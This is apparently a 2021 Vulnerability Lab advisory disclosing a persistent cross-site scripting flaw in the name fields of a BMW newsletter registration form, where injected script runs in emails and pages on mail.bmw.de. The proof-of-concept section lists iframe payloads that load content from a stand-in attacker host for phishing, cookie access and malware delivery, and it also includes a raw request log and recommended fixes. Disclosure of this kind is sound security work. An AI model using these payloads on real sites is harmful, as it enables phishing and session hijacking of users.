Site vulnerability-lab.com

BMW Online appears to allow script insertion that can get embedded into emails.

Document Title:
===============
BMW Online (Mail) - Persistent Web Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2262

Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2021/10/19/bmw-mail-persistent-validation-vulnerability


Release Date:
=============
2021-10-19


Vulnerability Laboratory ID (VL-ID):
====================================
2262


Common Vulnerability Scoring System:
====================================
5.9


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Die Bayerische Motoren Werke Aktiengesellschaft (BMW AG) ist ein weltweit operierender, börsennotierter Automobil- und Motorradhersteller mit Sitz in München,
der unter dem Markennamen BMW Group auftritt. Die Produktpalette umfasst die Automobil- und Motorrad-Marke BMW, die Automarken Mini und Rolls-Royce sowie die
BMW-Submarken BMW M und BMW i.

Der Konzern hat sich vor allem seit den 1960er Jahren unter der Marke BMW als Hersteller hochpreisiger, komfortabel ausgestatteter und gut motorisierter Reisewagen
mit sportlichem Anspruch einen Namen gemacht und zählt damit zu den sogenannten Premiumherstellern. Daneben zielt die Marke Mini mit Retro-Modellen auf jüngere,
lifestyle-orientierte Kundschaft ab, während bei Rolls-Royce in geringer Stückzahl höchstpreisige Luxuslimousinen entstehen. Die Kernmarke BMW geht auf die 1913
durch Karl Rapp in München gegründeten Rapp Motorenwerke zurück. Sie wurden durch Franz Josef Popp ab 1917 ausgebaut und firmierten ab 1918 als Aktiengesellschaft
Bayerische Motorenwerke sowie ab 1920 als Süddeutsche Bremsen-AG. Die Motorenbau-Abteilung und der alte Unternehmensname wurden 1922 verkauft und in die 1916
begründete Bayerische Flugzeugwerke AG eingegliedert, die seitdem als BMW firmiert.

BMW gehört mit 104,2 Milliarden Euro Umsatz und rund 134.000 Beschäftigten im Geschäftsjahr 2019 zu den größten Wirtschaftsunternehmen Deutschlands und zählte
mit einer Jahresproduktion von 2,54 Millionen Fahrzeugen im Jahr 2019 zu den 15 größten Autoherstellern der Welt. Das Unternehmen ist sowohl mit Stamm- als
auch Vorzugsaktien an der Börse notiert, wobei die Stammaktie im deutschen Leitindex DAX sowie im DivDAX vertreten ist. Größte Anteilseigner mit zusammen etwa
46,8 % sind Susanne Klatten und Stefan Quandt, die der Industriellenfamilie Quandt angehören. Darüber hinaus ist BMW auch 2018 in den Nachhaltigkeitsindeces
Dow Jones Sustainability Indices (DJSI) „World“ und „Europe“ sowie FTSE4Good gelistet.

(Copy of the Homepage: https://de.wikipedia.org/wiki/BMW )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent input validation web vulnerability in the BMW online service web-application.


Affected Product(s):
====================
BMW
Product: Mailing Server - Online Service (Web-Application) 2020 Q1


Vulnerability Disclosure Timeline:
==================================
2020-06-04: Researcher Notification & Coordination (Security Researcher)
2020-06-05: Vendor Notification (BMW-CERT Department)
2020-08-27: Vendor Response/Feedback (BMW-CERT Department)
2021-10-10: Vendor Fix/Patch by Check (BMW Service Developer Team)
2021-**-**: Security Acknowledgements (BMW-CERT Department)
2021-10-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (User Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Bug Bounty


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official BMW online service portal web-application.
Guests are able to inject own malicious script codes on the application-side of the vulnerable service module to compromise emails
or delivered content via the sender.

The vulnerability is located in the `firstname` and `lastname` value parameters of the `mail` module. The vulnerable parameters are
insecure sanitized next to being delivered inside of a basic html mail template.

Remote attackers are able to inject own malicious script code via POST method request to the application-side of the bmw domain mailing service.
The attack vector of the vulnerability is persistent on the application-side and the request method to inject is POST. The attacker does not need
to be directly authenticated because its only an initial registration without direct activiation request. The injection points are the vulnerable
input fields in the BMW 4er Coupé registration formular and the execution of the malform injected code takes place in the `mail.bmw.de`, `m.mail.bmw.de`
domains with the unique `/jsp/m.jsp` file by a client-side GET method request.

The issue affects all pages listed with the newsletter module. The vulnerability allows email spoofing, phishing, spamming, cross site requests for
redirects to malware or exploits and persistent manipulation of bmw domain (email) contents. A targeted user can not see that the manipulated website
is insecure because of the trusted native source that deliveres the contexts over the bmw mailing (mail.bmw.de).

The exploitation of the persistent input validation web vulnerability requires no or low user inter action and no privileged application user account.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious sources
and persistent manipulation of affected web module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] BMW 4er Coupé - Registration Formular

Vulnerable Input(s):
[+] Vorname (Firstname)
[+] Nachname (Lastname)

Vulnerable Section(s):
[+] CONTENT

Vulnerablke File(s):
[+] m.jsp

Affected Domain(s):
[+] mail.bmw.de
[+] m.mail.bmw.de


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with low privileged application user account and medium required user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.


Payload: Phishing
test"><iframe src=http://www.evil.source.com/poc.html></iframe>


Payload: Session Hijacking
test"><iframe src=http://www.evil.source.com/ onload=alert(document.cookie)></iframe>
test"><iframe src=http://www.evil.source.com/ onload=alert(document.domain)></iframe>


Payload: Malware or Exploit
test"><iframe src=http://www.evil.source.com/poc.js></iframe>


Payload: Redirect
test"><window.frames["myFrame"].location = "http://...">


PoC: Demo URLs (Examples Non Malicious!)
https://m.mail.bmw.de/nl/jsp/m.jsp?c=%40Pv0kZwbsXqBiXLjqfLfhjQcmFl03K6l5EVY0L9chpQk%3D


--- PoC Session Logs (GET) [Execute] ---
https://m.mail.bmw.de/nl/jsp/m.jsp?c=%40Pv0kZwbsXqBiXLjqfLfhjQcmFl03K6l5EVY0L9chpQk%3D
Host: m.mail.bmw.de
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: uuid230=e171a7d5-3065-4691-9e39-dc051d6b6bb2; nlid=59b025|bd9a2846; bmwdtm_hq_userdata=lo:not logged in;
v_reco_data={"user":"returning","last_channel":"other","pages_viewed":{"https://www.bmw.de/de/index.html":2,
"https://configure.bmw.de/de_DE/configure/G22/11AP/FKFSW,P0668,S01S3":1},"site_sections_viewed":{"Index":2,"Configurator":1},
"session_duration":"622","configurator_session_duration":"8"}; at_check=true; bmwdtm_hq_vs=1591355369; s_lv=1591358075425; _cs_mk=0.8202769905305621_1591355369096;
_cs_c=1; _cs_id=d1d6f4a2-9e37-a0cf-fd19-495b95a51ace.1591355370.2.1591358075.1591358046.1.1625519370460.Lax.0;
AMCV_B52D1CFE5330949C0A490D45%40AdobeOrg=1585540135%7CMCMID%7C43471724831001338048363975029512836080%7CMCAID%7CNONE%7CMCOPTOUT-1591365306s%7CNONE%7CvVersion%7C4.4.0;
AMCVS_B52D1CFE5330949C0A490D45%40AdobeOrg=1;
s_ppvl=all-models%2520%253E%25204-series%2520%253E%2520coupe%2520%253E%25202020%2520%253E%2520bmw-4-series-coupe-highlights%2C93%2C65%2C6927%2C1920%2C884%2C1920%2C1080%2C1%2CP;
s_ppv=all-models%2520%253E%25204-series%2520%253E%2520coupe%2520%253E%25202020%2520%253E%2520bmw-4-series-coupe-models-equipment%2C100%2C100%2C7283%2C1920%2C884%2C1920%2C1080%2C1%2CP;
s_cc=true; dtTransferCookie==3=srv=2=sn=V9BCJG98FF13N2R0E8BB33TB9RSRD9AS=app:d6bac8ba1bbb22f2=1=ol=0=perc=100000=mul=1;
check=true; s_fid=%20;
last_config=%7B%22modelrange%22%3A%22G22%22%2C%22modelcode%22%3A%2211AP%22%2C%22ag_modelcode%22%3A%2211AP%22%2C%22brand%22%3A%22bmwCar%22%2C%22pain
t%22%3A%22P0668%22%2C%22rim%22%3A%22S01S3%22%2C%22fabric%22%3A%22FKFSW%22%2C%22options%22%3A%22FKFSW%2CP0668%2CS01CB%2CS01DF%2CS01S3%2CS0205%2CS0230
%2CS0255%2CS02PA%2CS02VB%2CS0428%2CS0431%2CS0493%2CS04AT%2CS04NE%2CS0508%2CS0534%2CS0544%2CS0548%2CS05AQ%2CS05DA%2CS0654%2CS06AE%2CS06AF%2CS06AK%2CS0
6C4%2CS06U2%2CS0801%2CS0851%2CS0879%2CS08KA%2CS08TF%2CS09QX%22%2C%22brandCosy%22%3A%22WBBM%22%7D; _pin_unauth=dWlkPU1ETXdNalZpTkRBdE9UQXhZUzAwWWpobUxX
STFaRE10WTJFM01XVm1PVEUxWVdRMg; mbox=session#caf2ce2d3adc47609e4fa1ac588d1a00#1591359906; bmwdtm_hq_sid=k55b3hBo5kgb;
bmwdtm_hq_pcg=topics%7Ctopics%20%3E%20fascination-bmw%7Ctopics%20%3E%20fascination-bmw%20%3E%20efficient-dynamics%7Ctopics%20%3E%20fascination-
bmw%20%3E%20efficient-dynamics%20%3E%20consumption-and-emissions%7Cconsumption-and-emissions; s_lv_s=Less%20than%201%20day; _cs_s=3.1
-
GET: HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html; charset=utf-8
Date: Fri, 05 Jun 2020 11:57:59 GMT
Server: Apache
Vary: Accept-Encoding
X-Robots-Tag: noindex
X-UA-Compatible: IE=edge
Content-Length: 9916
Connection: keep-alive



PoC: Source (Email & Web Pages)
<!-- start CONTENT -->
<table border="0" cellpadding="0" cellspacing="0" role="presentation" width="100%">
<tbody>
<tr>
<td align="center"><!--[if (gte mso 9)|(IE)]>
<table role="presentation" align="center" border="0" cellspacing="0" cellpadding="0" width="600">
<tr>
<td align="center" valign="top" width="700">
<![endif]-->
<table align="center" border="0" cellpadding="0" cellspacing="0" role="presentation" style="max-width: 700px; background-color: #ffffff;" width="100%" bgcolor="#ffffff">
<tbody>
<tr>
<td align="center">
<!-- Place next article here -->
<!-- start EDITORIAL -->
<table role="presentation" border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td style="padding: 55px 0px 0px 0px;" width="100%">
<table role="presentation" border="0" cellpadding="0" cellspacing="0" width="100%">
<!-- start salutation -->
<tr>
<td align="left" class="mob-pad-l-r" style="color: #000000;font-family: 'BMW-Light', Arial, sans-serif; font-size: 24px;line-height: 30px;font-weight: 300;padding: 0px 30px 20px 30px;">
Sehr geehrter Herr Dr. B>"<Iframe%20Src=evil.source%20onload=alert(document.domain)>[VORNAME|NACHNAME - EXCUTION POINT!],


Reference(s):
https://www.bmw.de/de/ssl/requests/rfo-bmw.html#/dlo#%2Fbrand=BM&configId=g8f8j3l6&ucpBaseurl=https:%2F%2Fprod.ucp.bmw.cloud
https://www.bmw.de/de/ssl/requests/brand-switch-rfi/rfi-type-switch-bmw/rfi-post-bmw.html#/brand=BM&configId=g8f8j3l6&ucpBaseurl=https://prod.ucp.bmw.cloud


Solution - Fix & Patch:
=======================
1. The vulnerability can be patched by a parse and encode of the vulnerable `firstname`, `lastname` input fields in all the affected newsletter registration forms.

2. Restrict the affected input fields and disallow the usage of special chars to prevent malicious script code injection attacks.

3. Escape or safe encode the name parameter content in the html generated template on the affected bmw mailing or unique domain page.

4. Sanitize in the outgoing emails through the bmw mail server the affected name parameters to finally resolve the vulnerability.

5. Due to the manipulation of the content with persistent vector the inner security mechanics should already have noted you about our interaction.
Normally when a user changes the contents the page links needs to be checked for malware or suspicious activities. In thus case our attack was invisible for the cert which could assist to readjust


Note: https://www.vulnerability-db.com/?q=articles/2021/10/19/bmw-mail-persistent-validation-vulnerability


Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the web-application module is estimated as medium.
The vulnerability can be used to produce malicious and malformed content to phish or exploit user session data the easy way.
The targeted users can not see that the delivered contents are not from the original bmw source. The user does not need to
verify his registration which allows to perform the attack against other accounts in a simple way.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact ([email protected] or [email protected]) to get a ask permission.

Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™



--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)